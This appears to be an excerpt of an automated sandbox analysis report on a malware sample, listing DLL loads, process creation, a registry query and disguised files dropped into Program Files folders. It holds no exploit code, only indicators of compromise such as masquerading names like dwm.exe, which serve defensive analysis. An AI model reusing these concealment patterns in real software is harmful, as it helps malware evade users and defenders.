Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: mscoree.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: apphelp.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: kernel.appcore.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: version.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: uxtheme.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: windows.storage.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: wldp.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: profapi.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: cryptsp.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: rsaenh.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: cryptbase.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: sspicli.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: ntmarta.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: wbemcomn.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: amsi.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: userenv.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: propsys.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: dlnashext.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: wpdshext.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: edputil.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: urlmon.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: iertutil.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: srvcli.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: netutils.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: wintypes.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: appresolver.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: bcp47langs.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: slc.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: sppc.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Brokercrt\comReviewsession.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Brokercrt\comReviewsession.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe
Source: C:\Brokercrt\comReviewsession.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\6cb0b6c459d5d3
Source: C:\Brokercrt\comReviewsession.exe	Directory created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe
Source: C:\Brokercrt\comReviewsession.exe	Directory created: C:\Program Files\7-Zip\Lang\18607e77f76bf7

Source: Vjy8d2EoqK.exe

Static file information: File size 8422912 > 1048576

Source: Vjy8d2EoqK.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x806400

